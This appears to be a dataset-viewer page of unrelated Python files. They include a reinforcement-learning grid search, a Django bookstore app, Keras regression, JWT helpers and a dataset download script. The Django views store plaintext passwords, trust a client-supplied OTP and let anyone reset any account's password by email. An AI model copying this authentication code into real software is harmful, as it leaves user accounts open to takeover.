,'MAX_STEPS' : 5 # how many steps must we play in each episode
#nn params
,'HIDDEN_SIZE': 20
,'HIDDEN_LAYERS' : 1
#discount rewards params
,'GAMMA' : 0.99
#ADAM Optimizer hyper-parameters:
,'LEARNING_RATE' : 0.01
,'B1' : 0.8
,'B2' : 0.999
,'EPSILON' : 1e-6
#learning params
,'TOTAL_EPISODES' : 10000
,'BATCH_NUMBER' : 20
,'DISPLAY_FREQ' : 500
}
grid = []
for gamma in np.arange(0, 1, 0.1):
for _ in range(2):
grid.append({
'GAMMA': gamma
})
res_list = []
for g in grid:
args = default_args.copy()
args.update(g)
print('*'*80)
print(args)
env = gym.make(args['ENV'])
# In[5]:
#Initializing
tf.reset_default_graph()
W1 = tf.get_variable(shape=[args['HIDDEN_SIZE'],args['STATE_INPUT_SIZE']],name='w1',
initializer=tf.contrib.layers.xavier_initializer())
if args['HIDDEN_LAYERS'] == 2:
W2 = tf.get_variable(shape=[args['HIDDEN_SIZE'],args['HIDDEN_SIZE']],name='w2',
initializer=tf.contrib.layers.xavier_initializer())
W3 = tf.get_variable(shape=[args['OP_NUMBER'],args['HIDDEN_SIZE']],name='w3',
initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.get_variable(shape=[args['HIDDEN_SIZE'],1],name='b1',
initializer=tf.contrib.layers.xavier_initializer())
if args['HIDDEN_LAYERS'] == 2:
b2 = tf.get_variable(shape=[args['HIDDEN_SIZE'],1],name='b2',
initializer=tf.contrib.layers.xavier_initializer())
b3 = tf.get_variable(shape=[args['OP_NUMBER'],1],name='b3',
initializer=tf.contrib.layers.xavier_initializer())
#Layers:
x = tf.placeholder(tf.float32, shape=[args['STATE_INPUT_SIZE'],None],name='x')
h1 = tf.tanh(tf.matmul(W1,x) + b1)
if args['HIDDEN_LAYERS'] == 2:
h2 = tf.tanh(tf.matmul(W2,h1) + b2)
y = tf.nn.softmax(tf.matmul(W3,h2) + b3,dim=0)
else:
y = tf.nn.softmax(tf.matmul(W3,h1) + b3,dim=0)
# In[6]:
saver = tf.train.Saver()
sess = tf.InteractiveSession()
# In[7]:
#Loss function:
curr_reward = tf.placeholder(shape=[None],dtype=tf.float32)
actions_array = tf.placeholder(shape=[None],dtype=tf.int32)
pai_array = tf.gather(y,actions_array)
L = -tf.reduce_mean(tf.log(pai_array)*curr_reward)
gradient_holders = []
gradients = tf.gradients(L,tf.trainable_variables())
# In[8]:
tvars = tf.trainable_variables()
#Initialize gradient lists for each trainable variable:
for idx,var in enumerate(tvars):
placeholder = tf.placeholder(tf.float32,name=str(idx)+'_holder')
gradient_holders.append(placeholder)
# In[9]:
#Update mechanism:
adam = tf.train.AdamOptimizer(learning_rate=args['LEARNING_RATE'],beta1=args['B1'],beta2=args['B2'],epsilon=args['EPSILON'])
update_batch = adam.apply_gradients(zip(gradient_holders,tvars))
# In[10]:
# grad buffer is initialized to all zeros.
# It's used to accumulate the gradients and is a regular variable, NOT a tf variable
def reset_graph():
init = tf.global_variables_initializer()
sess.run(init)
#saver.restore(sess, "../models/ianna-nn-supervised")
reset_graph()
grad_buffer = sess.run(tf.trainable_variables())
def reset_grad_buffer():
for ix,grad in enumerate(grad_buffer):
grad_buffer[ix] = grad * 0
# In[11]:
def get_action(sess,observation):
"""
Given an observation, return action sampled according to the probabilities of the NN output
"""
a_dist = sess.run(y,feed_dict={x:np.reshape(observation,(args['STATE_INPUT_SIZE'], 1))})
a = np.random.choice(range(args['OP_NUMBER']),p=a_dist.reshape((args['OP_NUMBER'])))
return a
# In[12]:
def train(sess,cur_states_array,cur_actions_array,cur_curr_reward):
"""
NN training procedure: Given arrays of states(observations),
actions and rewards it computes the derivatives of the loss function
then add the derivation values to the buffer
"""
G = sess.run(gradients,feed_dict={x:cur_states_array,actions_array:cur_actions_array,curr_reward:cur_curr_reward})
for idx,grad in enumerate(G):
grad_buffer[idx] += grad
# In[13]:
def update(sess):
"""
NN update procedure: apply the gradients to the NN variables
"""
feed_dict = dict(zip(gradient_holders, grad_buffer))
_ = sess.run(update_batch, feed_dict=feed_dict)
# In[14]:
# IANNA actions would be:
# 0) action_type: back[0], filter[1], group[2]
# 1) col_id: [0..num_of_columns-1]
# 2) filter_operator: LT[0], GT[1] if the selected column was numeric (maybe change semantics if column is STR?)
# 3) filter_decile: [0..9] the filter operand
# 4) aggregation column_id: [0..num_of_columns - 1] (what do we do if the selected col is also grouped_by?)
# 5) aggregation type: MEAN[0], COUNT[1], SUM[2], MIN[3], MAX[4]
def build_ianna_action_from_grouped_by_field(grouped_by_field):
action = [2, grouped_by_field, 0, 0, 0, 0]
return action
# In[21]:
def project_state_to_nn_input(x):
return x[args['START_STATE_FROM']:args['START_STATE_FROM']+args['STATE_INPUT_SIZE']]
# In[22]:
def discount_rewards(arr):
"""
Helper function for computing discounted rewards,
then the delayed rewards are normalized by the mean and std as requested.
"""
discounts = np.zeros_like(arr)
reward = 0
for i in reversed(range(arr.size)):
reward=args['GAMMA']*(arr[i]+reward)
discounts[i] = reward
# following 3 lines destroy everything when the game is really simple:
# pick 4 fields out of 5 without repeating yourself
#mean = np.mean(discounts,keepdims=True)
#discounts = discounts - mean
#discounts = discounts/ np.std(discounts)
return discounts
# In[28]:
episode_number = 0
rewards = []
steps=[]
max_reward=0
reset_graph()
reset_grad_buffer()
while episode_number < args['TOTAL_EPISODES']:
for ep in range(args['BATCH_NUMBER']):
obsrv = project_state_to_nn_input(env.reset())
ep_history=[]
step_num=0
total_reward=0
done=False
while not done and step_num < args['MAX_STEPS']:
#Perform the game "step:"
step_num+=1
action = get_action(sess,obsrv)
if args['ENV'] == 'IANNA-v0':
complex_action = build_ianna_action_from_grouped_by_field(action)
obsrv1, reward, done, info = env.step(complex_action)
else:
obsrv1, reward, done, info = env.step(action)
total_reward+=reward
ep_history.append((np.array(obsrv),action,reward))
obsrv=project_state_to_nn_input(obsrv1)
episode_number+=1
ep_history= np.array(ep_history)
ep_history[:,2] = discount_rewards(ep_history[:,2])
"""
perform the training step,
feeding the network with the ep_history that contains
the states,actions, and discounted rewards
"""
ep_states_array = np.vstack(ep_history[:,0]).T
ep_actions_array = ep_history[:,1].T
ep_curr_reward = ep_history[:,2].T
L=train(sess, ep_states_array, ep_actions_array, ep_curr_reward)
#update the rewards/steps counter, storing the data for all episodes
rewards.append(total_reward)
steps.append(step_num)
if episode_number%args['DISPLAY_FREQ']==0:
print("latest game actions: ", ep_actions_array.T)
print("latest game reward: ", total_reward)
print("latest game first state: ", ep_states_array.T[0])
print("latest game last state: ", obsrv)
print("Total episodes: %d"%episode_number)
print("Average steps per %d episodes: %f"%(args['DISPLAY_FREQ'], np.mean(steps[-args['DISPLAY_FREQ']:])))
print("Average reward per %d episodes : %f"%(args['DISPLAY_FREQ'], np.mean(rewards[-args['DISPLAY_FREQ']:])))
args['AVERAGE_REWARD_%d' % episode_number] = np.mean(rewards[-args['DISPLAY_FREQ']:])
update(sess)
reset_grad_buffer()
if np.mean(rewards[-args['BATCH_NUMBER']:])>max_reward:
max_reward=np.mean(rewards[-args['BATCH_NUMBER']:])
print("\t\t\tCurr Max mean reward per batch:",max_reward)
res_list.append(args)
res = pd.DataFrame(res_list)
res.to_csv('grid_search_rl.csv')
# In[ ]:
sess.close()
|
from flask import Flask, render_template, request, Response
app = Flask(__name__)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/post_coord", methods=["POST"])
def get_coord():
x = request.form["x"]
y = request.form["y"]
print("x:{}, y:{}".format(x, y))
return "200 OK"
app.run(host="0.0.0.0", port=8000, debug=True,
threaded=True, use_reloader=False) |
from fastapi import APIRouter
from fastapi.param_functions import Depends
from pydantic.main import BaseModel
from datetime import date
from ....domain.controller import create_invite_controller
from ..middlewares import ensure_authenticated
class Dto(BaseModel):
date: date
artist_id: str
latitude: float
longitude: float
postal_code: str
address: str
address_number: int
create_invite_router = APIRouter()
@create_invite_router.post("/invites")
async def execute(request: Dto, auth_user = Depends(ensure_authenticated)):
dto = {
**request.__dict__,
"establishment_id": auth_user.user_id
}
return create_invite_controller.handle(dto)
|
from django.shortcuts import render,redirect
from .models import Contact,User,Book,Cart,Wishlist,Transaction
from django.conf import settings
from django.core.mail import send_mail
import random
from .paytm import generate_checksum, verify_checksum
from django.views.decorators.csrf import csrf_exempt
def initiate_payment(request):
if request.method == "GET":
return render(request, 'myapp/pay.html')
try:
amount = int(request.POST['amount'])
except:
return render(request, 'myapp/pay.html', context={'error': 'Wrong Accound Details or amount'})
user=User.objects.get(email=request.session['email'])
transaction = Transaction.objects.create(made_by=user, amount=amount)
transaction.save()
merchant_key = settings.PAYTM_SECRET_KEY
params = (
('MID', settings.PAYTM_MERCHANT_ID),
('ORDER_ID', str(transaction.order_id)),
('CUST_ID', str(user.email)),
('TXN_AMOUNT', str(transaction.amount)),
('CHANNEL_ID', settings.PAYTM_CHANNEL_ID),
('WEBSITE', settings.PAYTM_WEBSITE),
# ('EMAIL', request.user.email),
# ('MOBILE_N0', '9911223388'),
('INDUSTRY_TYPE_ID', settings.PAYTM_INDUSTRY_TYPE_ID),
('CALLBACK_URL', 'http://127.0.0.1:8000/callback/'),
# ('PAYMENT_MODE_ONLY', 'NO'),
)
paytm_params = dict(params)
checksum = generate_checksum(paytm_params, merchant_key)
transaction.checksum = checksum
transaction.save()
paytm_params['CHECKSUMHASH'] = checksum
print('SENT: ', checksum)
return render(request, 'myapp/redirect.html', context=paytm_params)
@csrf_exempt
def callback(request):
if request.method == 'POST':
received_data = dict(request.POST)
paytm_params = {}
paytm_checksum = received_data['CHECKSUMHASH'][0]
for key, value in received_data.items():
if key == 'CHECKSUMHASH':
paytm_checksum = value[0]
else:
paytm_params[key] = str(value[0])
# Verify checksum
is_valid_checksum = verify_checksum(paytm_params, settings.PAYTM_SECRET_KEY, str(paytm_checksum))
if is_valid_checksum:
received_data['message'] = "Checksum Matched"
else:
received_data['message'] = "Checksum Mismatched"
return render(request, 'myapp/callback.html', context=received_data)
def index(request):
try:
if request.session['email']:
user=User.objects.get(email=request.session['email'])
print(user)
if user.usertype=="user":
return render(request,'myapp/index.html')
elif user.usertype=="seller":
return render(request,'myapp/seller_index.html')
except:
return render(request,'myapp/login.html')
def python(request):
books=Book.objects.filter(book_category='python')
return render(request,'myapp/python.html',{'books':books})
def java(request):
books=Book.objects.filter(book_category='java')
return render(request,'myapp/java.html',{'books':books})
def php(request):
books=Book.objects.filter(book_category='php')
return render(request,'myapp/php.html',{'books':books})
def login(request):
if request.method=="POST":
email=request.POST['email']
password=request.POST['password']
try:
user=User.objects.get(email=email,password=password)
if user.status=="active" and user.usertype=="user":
mycart=Cart.objects.filter(user=user)
request.session['cartcount']=len(mycart)
request.session['fname']=user.first_name
request.session['email']=user.email
request.session['user_image']=user.user_image.url
return render(request,'myapp/index.html')
elif user.status=="active" and user.usertype=="seller":
request.session['fname']=user.first_name
request.session['email']=user.email
request.session['user_image']=user.user_image.url
return render(request,'myapp/seller_index.html')
else:
msg="you still not verify your account"
return render(request,'myapp/enter_email.html',{'msg':msg})
except:
msg="Email and password does not exist."
return render(request,'myapp/login.html',{'msg':msg})
else:
return render(request,'myapp/login.html')
def signup(request):
if request.method=="POST":
user=User()
user.usertype=request.POST['usertype']
user.fname=request.POST['fname']
user.lname=request.POST['lname']
user.email=request.POST['email']
user.mobile=request.POST['mobile']
user.password=request.POST['password']
user.cpassword=request.POST['cpassword']
user.user_image=request.FILES['user_image']
a=User.objects.filter(email=user.email)
if a:
msg="Email alrady exist"
return render(request,'myapp/login.html',{'msg':msg})
elif user.password==user.cpassword:
User.objects.create(first_name=user.fname,last_name=user.lname,email=user.email,password=user.password,cpassword=user.cpassword,mobile=user.mobile,usertype=user.usertype,user_image=user.user_image)
rec=[user.email,]
subject="OTP for Registration"
otp=random.randint(1000,9999)
message="your OTP for Registration is "+str(otp)
email_from=settings.EMAIL_HOST_USER
send_mail(subject,message,email_from,rec)
return render(request,'myapp/verify_otp.html',{'otp':otp,'email':user.email})
else:
msg="Password and Confirm Password Doen't Match"
return render(request,'myapp/signup.html',{'msg':msg,'user':user})
else:
return render(request,'myapp/signup.html')
def contact(request):
if request.method=="POST":
name=request.POST['name']
email=request.POST['email']
mobile=request.POST['mobile']
remarks=request.POST['remarks']
Contact.objects.create(name=name,email=email,mobile=mobile,remarks=remarks)
# msg="contact saved successfully"
# contacts=Contact.objects.all().order_by("-id")
# return render(request,'myapp/contact.html',{'msg':msg, 'contacts':contacts})
return redirect("contact")
else:
contacts=Contact.objects.all().order_by("-id")
return render(request,'myapp/contact.html',{'contacts':contacts,})
def verify_otp(request):
otp=request.POST['otp']
email=request.POST['email']
u_otp=request.POST['u_otp']
if otp==u_otp:
user=User.objects.get(email=email)
if user.status=="active":
return render(request,"myapp/new_password.html",{'email':email})
else:
user.status="active"
user.save()
msg="Your account now Active"
return render(request,"myapp/login.html",{'msg':msg})
else:
msg="entered OTP is incorrect Please re-enter your correct OTP"
return render(request,"myapp/verify_otp.html",{'otp':otp,'email':email,'msg':msg})
def logout(request):
try:
del request.session['fname']
del request.session['email']
return render(request,'myapp/login.html')
except:
pass
def enter_email(request):
return render(request,'myapp/enter_email.html')
def forgot_password(request):
email=request.POST['email']
password=request.POST['password']
cpassword=request.POST['cpassword']
if password==cpassword:
try:
user=User.objects.get(email=email)
user.password=password
user.cpassword=cpassword
user.save()
msg="Password Updated Succeed"
return render(request,'myapp/login.html',{'msg':msg})
except:
pass
else:
msg="Password and Confirm Password not matched"
return render(request,'myapp/new_password.html',{'msg':msg,'email':email})
def send_otp(request):
email=request.POST['email']
try:
user=User.objects.get(email=email)
if user:
rec=[email,]
subject="OTP for validation"
otp=random.randint(1000,9999)
message="your OTP for Registration is "+str(otp)
email_from=settings.EMAIL_HOST_USER
try:
send_mail(subject,message,email_from,rec)
return render(request,'myapp/verify_otp.html',{'otp':otp,'email':email})
except:
msg="Network issue."
return render(request,'myapp/login.html',{'msg':msg})
except:
msg="email does not exist."
return render(request,'myapp/login.html',{'msg':msg})
def change_password(request):
if request.method=="POST":
user=User.objects.get(email=request.session['email'])
old_password=request.POST['old_password']
new_password=request.POST['new_password']
new_cpassword=request.POST['new_cpassword']
if user.password!=old_password:
msg="old Password is doesn't match"
return render(request,'myapp/change_password.html',{'msg':msg})
elif new_password!=new_cpassword:
msg="New Password & Confirm Password Doesn't Match"
return render(request,'myapp/change_password.html',{'msg':msg})
else:
user.password=new_password
user.cpassword=new_cpassword
user.save()
try:
del request.session['fname']
del request.session['email']
msg="Password changed successfully.Please login again"
return render(request,'myapp/login.html',{'msg':msg})
except:
pass
return render(request,'myapp/change_password.html')
def add_book(request):
if request.method=="POST":
bc=request.POST['book_category']
bn=request.POST['book_name']
bp=request.POST['book_price']
ba=request.POST['book_author']
bd=request.POST['book_desc']
bi=request.FILES['book_image']
bse=request.session['email']
Book.objects.create(book_category=bc,book_name=bn,book_price=bp,book_author=ba,book_desc=bd,book_image=bi,book_seller_email=bse),
msg="Book Added successfully"
return render(request,'myapp/add_book.html',{'msg':msg})
else:
return render(request,'myapp/add_book.html')
def seller_index(request):
return render(request,'myapp/seller_index.html')
def view_book(request):
books=Book.objects.filter(book_status="active",book_seller_email=request.session["email"])
return render(request,'myapp/view_book.html',{'books':books})
def book_detail(request,pk):
books=Book.objects.get(pk=pk)
return render(request,'myapp/book_detail.html',{'books':books})
def delete_book(request,pk):
books=Book.objects.get(pk=pk)
books.book_status="inactive"
books.save()
books=Book.objects.filter(book_status="active",book_seller_email=request.session["email"])
msg="Book Inactivated successfully."
return render(request,'myapp/view_book.html',{'msg':msg,'books':books})
def inactive_book(request):
books=Book.objects.filter(book_status="inactive")
return render(request,'myapp/inactive_book.html',{'books':books})
def active_book(request,pk):
books=Book.objects.get(pk=pk)
books.book_status="active"
books.save()
books=Book.objects.filter(book_status="inactive")
msg="book Activated successfully"
return render(request,'myapp/view_book.html',{'msg':msg,'books':books})
def search_book(request):
search=request.POST["search"]
try:
user=User.objects.get(email=request.session['email'])
if user.usertype=='seller':
books=Book.objects.filter(book_status="active",book_category__contains=search,book_seller_email=request.session["email"])
return render(request,'myapp/more_details.html',{'books':books})
else:
books=Book.objects.filter(book_status="active",book_category__contains=search)
return render(request,'myapp/view_book.html',{'books':books})
except Exception as e:
print(e)
def profile(request):
if request.method=="POST":
first_name=request.POST['fname']
last_name=request.POST['lname']
mobile=request.POST['mobile']
email=request.POST['email']
user=User.objects.get(email=email)
try:
if request.FILES['user_image']:
user_image=request.FILES['user_image']
except:
user_image=user.user_image
user.user_image=user_image
user.first_name=first_name
user.last_name=last_name
user.mobile=mobile
user.save()
request.session['fname']=user.first_name
request.session['email']=user.email
request.session['user_image']=user.user_image.url
msg="Profile Updated successfully"
return render(request,'myapp/profile.html',{'msg':msg,'user':user})
else:
user=User.objects.get(email=request.session['email'])
try:
if user.usertype=='user':
data="user"
return render(request,'myapp/profile.html',{'user':user,'data':data})
else:
return render(request,'myapp/profile.html',{'user':user})
except:
return render(request,'myapp/profile.html')
def user_book_details(request,pk):
books=Book.objects.get(pk=pk)
return render(request,'myapp/user_book_details.html',{'books':books})
def add_to_cart(request,pk):
book=Book.objects.get(pk=pk)
user=User.objects.get(email=request.session['email'])
Cart.objects.create(book=book,user=user)
mycart=Cart.objects.filter(user=user)
request.session['cartcount']=len(mycart)
w=Wishlist.objects.filter(pk=pk)
w.delete()
return render(request,'myapp/my_cart.html',{'mycart':mycart})
def my_cart(request):
total_price=0
user=User.objects.get(email=request.session['email'])
mycart=Cart.objects.filter(user=user)
request.session['cartcount']=len(mycart)
for i in mycart:
total_price=total_price+int(i.book.book_price)
# a=i.book.book_price
# print("price is",a)
return render(request,'myapp/my_cart.html',{'mycart':mycart,'total_price':total_price})
def remove_cart(request,pk):
mycart=Cart.objects.filter(pk=pk)
mycart.delete()
user=User.objects.get(email=request.session['email'])
mycart=Cart.objects.filter(user=user)
request.session['cartcount']=len(mycart)
msg="Book's Removed from Cart successfully"
return render(request,'myapp/my_cart.html',{'mycart':mycart,'msg':msg})
def move_to_wishlist(request,pk):
cart=Cart.objects.get(pk=pk)
book=Wishlist.objects.filter(book=cart.book,user=cart.user)
if book:
user=User.objects.get(email=request.session['email'])
wish_list=Wishlist.objects.filter(user=user)
msg="book is alrady available in wishlist"
return render(request,'myapp/wish_list.html',{'wish_list':wish_list,'msg':msg})
else:
Wishlist.objects.create(book=cart.book,user=cart.user)
cart.delete()
user=User.objects.get(email=request.session['email'])
wish_list=Wishlist.objects.filter(user=user)
return render(request,'myapp/wish_list.html',{'wish_list':wish_list})
def wishlist(request):
user=User.objects.get(email=request.session['email'])
wish_list=Wishlist.objects.filter(user=user)
return render(request,'myapp/wish_list.html',{'wish_list':wish_list})
def remove_wishlist(request,pk):
wishlist=Wishlist.objects.filter(pk=pk)
wishlist.delete()
msg="Wised Book Deleted"
return render(request,'myapp/wish_list.html',{'msg':msg,'wishlist':wishlist})
def move_to_cart(request,pk):
wishlist=Wishlist.objects.get(pk=pk)
cart=Cart.objects.filter(book=wishlist.book,user=wishlist.user)
if cart:
user=User.objects.get(email=request.session['email'])
cart=Cart.objects.filter(user=user)
msg="book is alrady available in Cart"
return render(request,'myapp/my_cart.html',{'cart':cart,'msg':msg})
else:
Cart.objects.create(book=wishlist.book,user=wishlist.user)
wishlist.delete()
user=User.objects.get(email=request.session['email'])
mycart=Cart.objects.filter(user=user)
return render(request,'myapp/my_cart.html',{'mycart':mycart,'user':user})
def add_to_wishlist(request,pk):
book=Book.objects.get(pk=pk)
user=User.objects.get(email=request.session['email'])
Wishlist.objects.create(book=book,user=user)
wish_list=Wishlist.objects.filter(user=user)
return render(request,'myapp/wish_list.html',{'wish_list':wish_list})
|
import numpy as np
x_data = np.load('../data/npy/boston_x.npy')
y_data = np.load('../data/npy/boston_y.npy')
print(x_data.shape, y_data.shape)
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size=0.2, random_state=45)
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.2, random_state=45)
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
scaler.fit(x_train)
x_train = scaler.transform(x_train)
x_test = scaler.transform(x_test)
x_val = scaler.transform(x_val)
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Input
input1 = Input(shape=(13,))
dense1 = Dense(128, activation='relu')(input1)
dense2 = Dense(64, activation='relu')(dense1)
dense3 = Dense(64, activation='relu')(dense2)
dense4 = Dense(64, activation='relu')(dense3)
dense5 = Dense(64, activation='relu')(dense4)
output1 = Dense(1)(dense5)
model = Model(inputs=input1, outputs=output1)
model.compile(loss='mse', optimizer='adam', metrics=['mae'])
from tensorflow.keras.callbacks import EarlyStopping
es = EarlyStopping(monitor='val_loss', patience=20, mode='auto')
model.fit(x_train, y_train, epochs=4000, batch_size=8, validation_data=(x_val, y_val), verbose=2, callbacks=[es])
loss, mae = model.evaluate(x_test, y_test)
print('loss :', loss)
print('MAE :', mae)
y_predict = model.predict(x_test)
from sklearn.metrics import mean_squared_error, r2_score
def rmse(y_test, y_predict):
return np.sqrt(mean_squared_error(y_test, y_predict))
print('RMSE :', rmse(y_test, y_predict))
r2 = r2_score(y_test, y_predict)
print('R2 :', r2)
# Result
# loss : 12.888792991638184
# MAE : 2.693161725997925
# RMSE : 3.5900966129801355
# R2 : 0.8807454181824746 |
from setuptools import setup, find_packages
setup(
name="tutils",
version="1.0",
author="trans",
author_email="transcendentsiki@gmail.com",
packages=find_packages()
)
# py_modules=['tutils'], |
#import sys
#input = sys.stdin.readline
def main():
N = int( input())
A = list( map( int, input().split()))
root = 1
if A[0] == 1:
if N == 0:
print(1)
else:
print(-1)
return
B = A[::-1]
low = high = B[0]
# Low = []
Hight = [high]
Low = [low]
for b in B[1:]:
low = max(1, (low+1)//2) + b
high = high + b
Hight.append(high)
Low.append(low)
if low > 1:
print(-1)
return
ans = 1
now = 1
BHight = Hight[::-1]
BLow = Low[::-1]
for i in range(1,N+1):
high = BHight[i]
low = BLow[i]
if high < now or now*2 < low:
print(-1)
return
leaf = A[i]
now = min(high, now*2)
ans += now
now -= leaf
print(ans)
if __name__ == '__main__':
main()
|
file_name = '/home/kenny/data/Rfam.seed'
counter = 0
with open(file_name, 'rb') as f:
for line in f:
if(line == b'# STOCKHOLM 1.0\n'):
if(counter !=0):
tempFile.close()
counter += 1
tempFile = open('/home/kenny/data/msa/RF000{}.msa'.format(counter), "xb")
tempFile.write(line)
#print(line) if counter < 1000 else 0
|
import json
import jwt
import time
from datetime import datetime, timedelta
from django.conf import settings as st
from logging import getLogger
logger = getLogger('command')
__all__ = ('logger',)
def json_loads(data):
try:
return json.loads(data)
except:
return data
def json_dumps(data, indent=4):
try:
return json.dumps(data, indent=indent)
except:
return data
def jwt_encode(data):
exp_time = datetime.now() + timedelta(days=1)
exp_time = int(time.mktime(exp_time.timetuple()))
data.update({
'exp': exp_time,
})
encode = jwt.encode(data, st.SECRET_KEY)
return encode.decode("utf-8")
def jwt_decode(data):
try:
return jwt.decode(data, st.SECRET_KEY)
except Exception as ex:
print(ex)
return None
|
import urllib2
example = urllib2.urlopen("http://example.com").headers.items()
wikipedia = urllib2.urlopen("http://en.wikipedia.org/wiki/Python_(programming_language)").headers.items()
statesman = urllib2.urlopen("http://statesman.com").headers.items()
print([x[1] for x in example if x[0] == 'last-modified'])
print([x[1] for x in statesman if x[0] == 'server'])
print([x[1] for x in wikipedia if x[0] == 'age'])
|
# Generated by Django 2.0 on 2017-12-15 20:48
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0011_userprofile_dob'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='dob',
field=models.DateField(default=datetime.date.today),
),
]
|
def recursion(number):
if number<=10:
print(f'{number}',end= ' ')
recursion(number+1)
print(f'{number}',end= ' ')
recursion(1)
|
# extract tars
import subprocess
import glob
import argparse
if __name__ == "__main__":
# download
sequences = [
"machine_hall/MH_01_easy/MH_01_easy.zip",
"machine_hall/MH_02_easy/MH_02_easy.zip",
"machine_hall/MH_03_medium/MH_03_medium.zip",
"machine_hall/MH_04_difficult/MH_04_difficult.zip",
"machine_hall/MH_05_difficult/MH_05_difficult.zip",
"vicon_room1/V1_01_easy/V1_01_easy.zip",
"vicon_room1/V1_01_easy/V1_01_easy.zip",
"vicon_room1/V1_02_medium/V1_02_medium.zip",
"vicon_room1/V1_03_difficult/V1_03_difficult.zip",
"vicon_room2/V2_01_easy/V2_01_easy.zip",
"vicon_room2/V2_02_medium/V2_02_medium.zip",
"vicon_room2/V2_03_difficult/V2_03_difficult.zip",
]
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/machine_hall/MH_01_easy/MH_01_easy.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/machine_hall/MH_02_easy/MH_02_easy.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/machine_hall/MH_03_medium/MH_03_medium.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/machine_hall/MH_04_difficult/MH_04_difficult.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/machine_hall/MH_05_difficult/MH_05_difficult.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room1/V1_01_easy/V1_01_easy.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room1/V1_01_easy/V1_01_easy.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room1/V1_02_medium/V1_02_medium.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room1/V1_03_difficult/V1_03_difficult.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room2/V2_01_easy/V2_01_easy.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room2/V2_02_medium/V2_02_medium.zip
# http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room2/V2_03_difficult/V2_03_difficult.zip
# base_path = "https://vision.in.tum.de/rgbd/dataset/"
base_path = "http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/"
parser = argparse.ArgumentParser(description="Foo")
parser.add_argument(
"--dataset_dir", type=str, default="./", help="path to download dataset, need large storage"
)
parser.add_argument(
"--if_download", action="store_true", default=False, help="download the dataset"
)
parser.add_argument(
"--if_untar", action="store_true", default=False, help="untar the downloaded file"
)
args = parser.parse_args()
print(args)
if_download = args.if_download # True
if_untar = args.if_untar # True
if if_download:
for seq in sequences:
subprocess.run(f"wget {base_path + seq} -P {args.dataset_dir}", shell=True, check=True)
if if_untar:
# unzip
tar_files = glob.glob(f"{args.dataset_dir}/*.zip")
for f in tar_files:
command = f"unzip {f} -d {str(f)[:-4]}"
print(f"run: {command}")
subprocess.run(command, shell=True, check=True)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.